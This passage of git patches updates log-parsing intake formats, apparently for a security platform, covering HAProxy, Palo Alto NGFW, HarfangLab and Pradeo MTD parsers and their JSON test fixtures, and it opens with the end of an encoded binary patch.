zG<E-H06=-9vNzyMYT%Sn5UL@R)nPEJBgeM+^z+ayAkR>cr0lO94SfHuIlAs8OH$jq
zQdV%)W!@UP1{0;kqXRjF55y<3@CA{uZN@D#ebr9s)HYWug3bw{9lX80!w&6*=#haa
z$ucM~TlHBv9<MWTGQKq^Kij>FHH>Yd-?;deuQ(-tWaaT734!w`A^;QRdHmQ^M@++a
zM5Y|kRyDLAj1B{K2>XP=;*5X_OR9jUtjUCQS_J$57Qo0c4K4f7i5OE~1wi!av9UVl
zU0rTJ@jhWN6?>HC`q1y=i3UKgILuuLxK*<$1?{~p$@fb$^VB%^AAR|~TRhR15_~oZ
z)P@=}kA%A?woiKjzjaL2J5F(}hVyf!JY8TYa7?Rm{s)hnxqmRyQ8WYJZeee55}rRp
zMJeT@KrcFjt_C9J=znMX&ajinA%EbChekK+Imv395quCXWOD9OdmDUL^wW^dO~tr-
zQxIw{!Zw%K)b@U9(U}<$`hukxW{!DFkTC@56v-QE^i}fa+#BAz%Kvl7&nW69Zq?gg
z?{?{X^HULMrX)l~r;i?*1IXQySr1mxA#zs_At@yE-jG+n!xW58AF^REL9*s)qLslv
zycCESJXvq0v(#^%zZCq{6h3g$VIP#AQAuTjTe!fbE63_bM%<|dbzk6;;|Ix#&>54G
zllP-LqC5X%X?_2rU^3bZ0C()Mqy#WN33O$p68WP1VqqIv*0TL|i0E6QM6I!YD25Wa
z1oGt=NVD>0f?KZe@0Ff6kjrI1^zCP;+D=rlax!lK2F`6V(;4jI!kh8-=@P(Gm(2z2
zttlK|mt<Tc**EN!*3@S{{+D+6?nzmy73IWIFl58;xao<_qH>%^J4)n*euDAe2_*Ci
zTWyg&m%{jsotU+UV9#}p7cYRLG6Z0eP@JEKh^Q_b^|*|SU_kf?Jw5j&(#9f&l)c?=
z|LV`$+8W;*%HS!6hU)nN7UqZF{<15FHU?qxWAO)HcE}UN9(R;%hN!S=ImuHSmyPG}
z9d@7QpWc`;p;-238#V=o;^R;H#AnXi_~0tGHQwuD9ha8@EzhLs5pT;UleIV=xKj!C
zQ&<l$M2Vt>tzG}<c`l}rPUWX%4F%T}lWd1$mL>7-uci+D`bDOo?rG^jf*;39$KsW0
z{%n;T*y2aDgSlyNI>1sRfQVDL0ofd@=X60W-BMbF;FC#!Bvg&_m%91by4N!a(7RBd
zeu~<dGVk-Y=c;^zwhauAAIC(u7u99^NZ^#lPO9ls#|VV<19KwwKpvOcyrBU?e@EmF
z<?%vo`ED!}DBv(W5YK~0nV(q$#hyO~EswIT{N8rWZ<v+=?xBdOve(N;Eg&+G-~QYg
z4gf8ER%s1PJjoSCcQ@+1-}nz5bOz0J5xxODG=S;;aj&HP2g&oL_8(fPBKW`_i?5c+
zc2?Fdz;I2nZru8<`XjVWKW?{P7FJ$ft|ylOu1i>UX6C;#=Ujn`oph6w$hZjWdqp1A
zl`j>IOS+pULa#gxRSv8|9Xs>6?>U=gs6Ulud;d({D>^?-7syFRm;k7A%8zw7D3g8p
zs<=$}d=;`G+Vx{xF1`gkF1G^4`6{K&JONCry;$jF-pKQL`|WI;T)S$`4%~JgLH<{Q
ze`QyxP`@zA^r-p091?p3n3pVlgX<ux*OyV8WFPRwNxENs2ZhsQXc`B<FZpYv4!-Tb
zz%>aNiNz5+#nt|{%`mkKLCeZ&2MJX8h0c|)w9m3ahh3oy({*Qgz($4swK~wmJsxdF
zjngNUb}g4(>|9nY<>3@c+tAEp`#3M0Hxz8vAWjaGHTLX%)CiyTBk0zq#!Hu*KbLBZ
z&Mq4j+f`DIpv}#(v$N}x+%Io_G&pZEz;|v%WU0M3;#6!r6{7`2ZImsdspYS>&a&0)
zC+Oe$J*kAvfN0m5RK;?0B6r(3fp~|s2wkGIE*Q<q=1!a1{K%T0I(0K)kQ%h0QS!!v
zXaS~Q;Hk{fS*-gFd{g(<wr<^aN^zHP>_o|QK+%EEWFQ*W^Uf4qjl&F=pgV=7nGKKv
z;X495H7mb9p(=J{%O)KyJ&+C-1XXbuENWr9{C3WcUK6|(`)gy?{ca~m?cYU!-fQ^Z
z?$Pg{JsYSBS=51q(0+#|*QvEb?+Y6)@U<-C+CiOgUZ?_Kc2yopKjM~rrO5dgR?4a%
z*8JC>Jf1)6v5A`QGwKQKgqVi?HP$Jdgv&!Z9h?2UX}Y~N+OJpiUoCe<P{#xIk;l+y
zeOoa~^Y@bP$%8%T9D(8A8tp>cYJR|Ir=;C$T?WFSWTsaWNfZx2;rOU`j53yUT4*k5
zVeb&hb1pWGkQA6xL(Oi&e@RaCdU?Ui_7|vkh3@)WKI@|Y8%2sEwX?T3mWhGExVvl!
zq$~^quQVlrzSdc7b(iu_!J9MeU0i~kyPhIiUFk4HcDLmKN=H|3Zfcl`GAl%rg=hb$
z;hW({-~Q2*4Z*MvB)bxyz5;b^#qALt_wIaDy{y=I48{?MXAr)5k*`^<brf=Iy6?96
z)i|y9-jL04KJ3Z?L_wE|BGztrVZVOI0DM~kGk=g;17t$-`GqNuq%cg@KR@f8nNV>V
zTeO@S+iqJ^QAJsjQoSNw-kqKsvlGf<9KSgx<H%AEb+@#%lzE&yMxad<p_^&O9P>nP
ziZ&Giyvs%?D@ourkOn~~UF&d=@bKspgvT*}7fCHLFakBCHve&ef*bdo_wy9iY^Y`-
z`-Zdw?Xwp+dcFCw+OZi%>ro<)uS)HT;8?sqpoYpvhTY!yM2d!LD;)5%#e#iRW;6;-
zb3hA!u{Yk2q}FIpq%bD$OxU^~)84@Ym!Hx+rOcraN&*5SvgEEe#>|Y2?XkOUz@pW~
zyQZx@#hI)9y~LIw&%J?-+!lyi3Gcfwf`B4L3$`=F=2fw@`-}}`?#NfM{)mxLvfp>H
z0VGA$&8}#ZCrI2Bo&N@mi-s+Ig^7*+{2APA{jqdCu2iQ|kV=Jy&OS-Tf-rn!-75<?
zQ%1g+X!%wRgW%bK{NXv^$)RYI7-#sEH`!JqXQT}1g=RIQ6PC*>ceuVY)J@af{xO~L
z^=e(%2ZDNG68?wFm~UeE@4x`5u0c*g0VrCIY!8%&f)v5bRI}7Ee+xbcqJTKm*+JIJ
zo|6t?@R<!rH*J&M`op^^c}s>RQ8BR#IJ<I^NT(`3FqZBAU;lpx{tw=PUly0Q;yWUS
Vevj;b0DpZ3Qc=`YsFt&M|3CZ0xi|m-


From 0aedcac5ee314aef6e255a9f7a4fe381c583f1f0 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 3 Dec 2024 17:57:02 +0100
Subject: [PATCH 307/317] chore(Microsoft): rename the Microsoft Defender XDR
 format

---
 Microsoft/microsoft-365-defender/_meta/manifest.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/_meta/manifest.yml b/Microsoft/microsoft-365-defender/_meta/manifest.yml
index 1c858333a..d2e9192ce 100644
--- a/Microsoft/microsoft-365-defender/_meta/manifest.yml
+++ b/Microsoft/microsoft-365-defender/_meta/manifest.yml
@@ -1,11 +1,11 @@
 uuid: 05e6f36d-cee0-4f06-b575-9e43af779f9f
-name: Microsoft 365 Defender
+name: Microsoft Defender XDR / Microsoft 365 Defender
 slug: microsoft-365-defender
 automation_connector_uuid: 57f8f587-18ee-434b-a4ed-b5459f5b0fef
 automation_module_uuid: 525eecc0-9eee-484d-92bd-039117cf4dac
 
 description: >-
-  Microsoft 365 Defender is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications.
+  Microsoft Defender XDR is a entreprise defense suite that coordinates detection, prevention, investigation, and response across endpoints, identities, email, and cloud applications.
 
   Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats.
 

From c03be93f20e239d55f6dc312cc7579e47d1c92a4 Mon Sep 17 00:00:00 2001
From: rombernier <romain.bernier@sekoia.io>
Date: Wed, 4 Dec 2024 16:49:13 +0100
Subject: [PATCH 308/317] update HA procy

---
 HAProxy/haproxy/CHANGELOG.md       |  4 +++
 HAProxy/haproxy/ingest/parser.yml  |  2 +-
 HAProxy/haproxy/tests/access4.json | 45 ++++++++++++++++++++++++++++++
 3 files changed, 50 insertions(+), 1 deletion(-)
 create mode 100644 HAProxy/haproxy/tests/access4.json

diff --git a/HAProxy/haproxy/CHANGELOG.md b/HAProxy/haproxy/CHANGELOG.md
index 60e2c8a26..9896476a3 100644
--- a/HAProxy/haproxy/CHANGELOG.md
+++ b/HAProxy/haproxy/CHANGELOG.md
@@ -7,6 +7,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+## 2024-12.04 - 1.0.1
+
+- Add support for aktci at the end of the log
+
 ## 2024-03.04 - 1.0.0
 
 ### Added
diff --git a/HAProxy/haproxy/ingest/parser.yml b/HAProxy/haproxy/ingest/parser.yml
index 98783cd3d..e1f5a3c88 100644
--- a/HAProxy/haproxy/ingest/parser.yml
+++ b/HAProxy/haproxy/ingest/parser.yml
@@ -14,7 +14,7 @@ pipeline:
             ([0-9])%{HOUR}:%{MINUTE}(?::%{SECOND})([0-9])
           HAPROXYURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})"
           TLS_PROTOCOL: "TLS"
-          HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(<BADREQ>|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?'
+          HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(<BADREQ>|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?( aktci:\"%{IP:aktci}\")?'
 
   - name: json
     filter: "{{grok.message.json_msg | length > 0}}"
diff --git a/HAProxy/haproxy/tests/access4.json b/HAProxy/haproxy/tests/access4.json
new file mode 100644
index 000000000..89630f6bc
--- /dev/null
+++ b/HAProxy/haproxy/tests/access4.json
@@ -0,0 +1,45 @@
+{
+  "input": {
+    "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "HAProxy",
+        "dialect_uuid": "ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9"
+      }
+    }
+  },
+  "expected": {
+    "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n",
+    "event": {
+      "kind": "access"
+    },
+    "http": {
+      "request": {
+        "method": "GET"
+      },
+      "response": {
+        "bytes": 1060,
+        "status_code": 200
+      },
+      "version": "1.1"
+    },
+    "related": {
+      "ip": [
+        "90.83.225.109"
+      ]
+    },
+    "source": {
+      "address": "90.83.225.109",
+      "ip": "90.83.225.109",
+      "port": 54761
+    },
+    "tls": {
+      "version": "1.2",
+      "version_protocol": "TLS"
+    },
+    "url": {
+      "original": "/path/get/resource",
+      "path": "/path/get/resource"
+    }
+  }
+}
\ No newline at end of file

From d6c0b58dcc4ebd765b594f8bc1121b35800a695b Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 6 Dec 2024 10:44:29 +0100
Subject: [PATCH 309/317] Fix quotes problem in reason message

---
 .../paloalto-ngfw/ingest/parser.yml           |  2 +-
 .../tests/test_system_event_13.json           | 74 +++++++++++++++++++
 2 files changed, 75 insertions(+), 1 deletion(-)
 create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json

diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index 944713355..c6cf58abe 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml	
@@ -626,7 +626,7 @@ pipeline:
           AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}"
           REASON1: 'User-ID server monitor %{HOSTNAME:hostname}\(%{WORD:vsys}\) %{GREEDYDATA:message}'
           REASON2: "ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}"
-          REASON3: "When authenticating user %{WORD:user} from %{IP:source_ip}, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile %{WORD:auth_profile}, vsys %{WORD:vsys}, Server Profile %{WORD:server_profile}, Server Address %{IP:destination_ip}"
+          REASON3: "When authenticating user '?%{WORD:user}'? from '?%{IP:source_ip}'?, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile '?%{WORD:auth_profile}'?, vsys '?%{WORD:vsys}'?, Server Profile '?%{WORD:server_profile}'?, Server Address '?%{IP:destination_ip}'?"
           REASON4: "failed authentication for user %{WORD:user}. Reason: %{GREEDYDATA:reason} auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{WORD:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, From: %{IP:source_ip}"
           REASON5: 'authenticated for user %{WORD:user}\.   auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{DATA:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, admin role %{WORD:admin_role}, From: %{IP:source_ip}\.'
     filter: '{{parsed_event.message.get("EventDescription") != None}}'
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json
new file mode 100644
index 000000000..780d2a093
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json	
@@ -0,0 +1,74 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    },
+    "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00"
+  },
+  "expected": {
+    "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "system",
+      "reason": "When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2024-11-26T21:10:01.627000Z",
+    "action": {
+      "name": "auth-success",
+      "type": "auth"
+    },
+    "destination": {
+      "address": "1.7.4.2",
+      "ip": "1.7.4.2"
+    },
+    "log": {
+      "hostname": "FWPAN00",
+      "level": "informational",
+      "logger": "system"
+    },
+    "observer": {
+      "name": "FWPAN00",
+      "product": "PAN-OS",
+      "serial_number": "02410100000000"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "auth-success",
+      "Threat_ContentType": "auth",
+      "authetification": {
+        "profile": "FWPA"
+      },
+      "server": {
+        "profile": "RADIUS_RSA"
+      },
+      "vsys": "shared"
+    },
+    "related": {
+      "ip": [
+        "1.2.5.5",
+        "1.7.4.2"
+      ],
+      "user": [
+        "test000555"
+      ]
+    },
+    "source": {
+      "address": "1.2.5.5",
+      "ip": "1.2.5.5"
+    },
+    "user": {
+      "name": "test000555"
+    }
+  }
+}
\ No newline at end of file

From 4c7891951ac1ac6dcfc605331cda92476af2c577 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 6 Dec 2024 10:48:35 +0100
Subject: [PATCH 310/317] Apply linter

---
 .../paloalto-ngfw/tests/test_system_event_13.json             | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json
index 780d2a093..b4429340a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_13.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00",
     "sekoiaio": {
       "intake": {
         "dialect": "Palo Alto NGFW",
         "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
       }
-    },
-    "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00"
+    }
   },
   "expected": {
     "message": "1,2024/11/26 22:10:01,02410100000000,SYSTEM,auth,2555,2024/11/26 22:10:01,,auth-success,FWPA,0,0,general,informational,\"When authenticating user 'test000555' from '1.2.5.5', a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile 'FWPA', vsys 'shared', Server Profile 'RADIUS_RSA', Server Address '1.7.4.2'\",738970652229900000000,0x0,0,0,0,0,,FWPAN00,0,0,2024-11-26T22:10:01.627+01:00",

From e7c29187f511ca9f20cce388986d707577befc53 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 10 Dec 2024 11:17:39 +0100
Subject: [PATCH 311/317] fix(HAproxy): change the way to handle additional
 information

---
 HAProxy/haproxy/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/HAProxy/haproxy/ingest/parser.yml b/HAProxy/haproxy/ingest/parser.yml
index e1f5a3c88..557604c8a 100644
--- a/HAProxy/haproxy/ingest/parser.yml
+++ b/HAProxy/haproxy/ingest/parser.yml
@@ -14,7 +14,7 @@ pipeline:
             ([0-9])%{HOUR}:%{MINUTE}(?::%{SECOND})([0-9])
           HAPROXYURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})"
           TLS_PROTOCOL: "TLS"
-          HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(<BADREQ>|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?( aktci:\"%{IP:aktci}\")?'
+          HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(<BADREQ>|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?%{GREEDYDATA}'
 
   - name: json
     filter: "{{grok.message.json_msg | length > 0}}"

From b597fe1c7d554917f5fe9b702553d9a03c05a535 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Tue, 10 Dec 2024 12:31:20 +0100
Subject: [PATCH 312/317] fix(Suricata): fix smart-description

---
 Suricata/suricata/_meta/smart-descriptions.json | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/Suricata/suricata/_meta/smart-descriptions.json b/Suricata/suricata/_meta/smart-descriptions.json
index b330a23c1..432cf533d 100644
--- a/Suricata/suricata/_meta/smart-descriptions.json
+++ b/Suricata/suricata/_meta/smart-descriptions.json
@@ -151,8 +151,7 @@
         "value": "query"
       },
       {
-        "field": "action.type",
-        "value": "dns"
+        "field": "dns.question.name"
       }
     ],
     "relationships": [

From e6a207c4cb874eac232f7f121382031860ed1ed1 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 10 Dec 2024 14:16:24 +0100
Subject: [PATCH 313/317] Fis on agent.id field for harfanglab

---
 HarfangLab/harfanglab/ingest/parser.yml          | 4 ++++
 HarfangLab/harfanglab/tests/threat_critical.json | 1 +
 HarfangLab/harfanglab/tests/threat_log.json      | 1 +
 3 files changed, 6 insertions(+)

diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 5050c7429..96338037d 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -142,6 +142,10 @@ stages:
           organization.id: "{{json_event.message.tenant}}"
           url.original: "{{json_event.message.details_url_request.url}}"
 
+      - set:
+          agent.id: "{{json_event.message.agents[0].agent_id}}"
+        filter: "{{json_event.message.agents | length > 0}}"
+
   network_info:
     actions:
       - set:
diff --git a/HarfangLab/harfanglab/tests/threat_critical.json b/HarfangLab/harfanglab/tests/threat_critical.json
index 94e83a1fd..e9b50e3db 100644
--- a/HarfangLab/harfanglab/tests/threat_critical.json
+++ b/HarfangLab/harfanglab/tests/threat_critical.json
@@ -10,6 +10,7 @@
       "start": "2024-03-19T09:21:00Z"
     },
     "agent": {
+      "id": "af5e2f63-becd-4660-ade8-30d04c0dd044",
       "name": "harfanglab"
     },
     "harfanglab": {
diff --git a/HarfangLab/harfanglab/tests/threat_log.json b/HarfangLab/harfanglab/tests/threat_log.json
index dcab41c28..233ffd066 100644
--- a/HarfangLab/harfanglab/tests/threat_log.json
+++ b/HarfangLab/harfanglab/tests/threat_log.json
@@ -10,6 +10,7 @@
       "start": "2024-02-07T15:18:00Z"
     },
     "agent": {
+      "id": "215fe295-905f-4a8d-8347-e9d438d4e415",
       "name": "harfanglab"
     },
     "harfanglab": {

From e927ad7740757db69157c57ffde80af5277eb184 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 10 Dec 2024 15:07:44 +0100
Subject: [PATCH 314/317] Pradeoo: fix on Pradeo MTD parser for application
 compliance

---
 Pradeo/pradeo-mtd/ingest/parser.yml           | 20 +++----
 .../tests/application_compliance_updated.json | 55 +++++++++++++++++++
 2 files changed, 65 insertions(+), 10 deletions(-)
 create mode 100644 Pradeo/pradeo-mtd/tests/application_compliance_updated.json

diff --git a/Pradeo/pradeo-mtd/ingest/parser.yml b/Pradeo/pradeo-mtd/ingest/parser.yml
index 239ce01d4..c10d3c444 100644
--- a/Pradeo/pradeo-mtd/ingest/parser.yml
+++ b/Pradeo/pradeo-mtd/ingest/parser.yml
@@ -176,16 +176,16 @@ stages:
           pradeo.device.mdmId: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.externalId}}"
           pradeo.device.emm: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.device.emmDeviceInfo.emm}}"
           pradeo.compliance.matchedResponseRules: "{{json_event.message.content.deviceApplication.compliance.matchedResponseRules}}"
-          pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.application.id}}"
-          pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.application.package.package}}"
-          pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.application.package.system}}"
-          pradeo.application.version: "{{json_event.message.content.deviceApplicationCompliance.application.version}}"
-          pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.application.versionCode}}"
-          pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.application.name}}"
-          pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.application.md5}}"
-          pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.application.sha1}}"
-          pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.application.sha256}}"
-          pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.status}}"
+          pradeo.application.id: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.id}}"
+          pradeo.application.package: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.package}}"
+          pradeo.application.system: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.package.system}}"
+          pradeo.application.version: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.version}}"
+          pradeo.application.versionCode: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.versionCode}}"
+          pradeo.application.name: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.name}}"
+          pradeo.application.md5: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.md5}}"
+          pradeo.application.sha1: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha1}}"
+          pradeo.application.sha256: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.application.sha256}}"
+          pradeo.detection.status: "{{json_event.message.content.deviceApplicationCompliance.deviceApplication.status}}"
       - filter: '{{json_event.message.type == "DeviceComplianceUpdated"}}'
         set:
           event.category: ["process"]
diff --git a/Pradeo/pradeo-mtd/tests/application_compliance_updated.json b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json
new file mode 100644
index 000000000..916f71473
--- /dev/null
+++ b/Pradeo/pradeo-mtd/tests/application_compliance_updated.json
@@ -0,0 +1,55 @@
+{
+  "input": {
+    "message": "{\n    \"id\": \"1234567890\",\n    \"creationDate\": \"2024-11-27T04:10:33.460Z\",\n    \"source\": \"system\",\n    \"category\": null,\n    \"type\": \"DeviceApplicationComplianceUpdated\",\n    \"content\": {\n        \"deviceApplicationCompliance\": {\n            \"id\": \"abcdef123456\",\n            \"status\": \"Disapproved\",\n            \"computed\": true,\n            \"creationDate\": \"2024-11-27T04:04:26.482Z\",\n            \"lastModificationDate\": \"2024-11-27T04:10:33.000Z\",\n            \"deviceApplication\": {\n                \"id\": \"123456789ABCDEF\",\n                \"application\": {\n                    \"id\": \"azertyuiop\",\n                    \"package\": {\n                        \"id\": \"1234abcd\",\n                        \"package\": \"com.app.test\",\n                        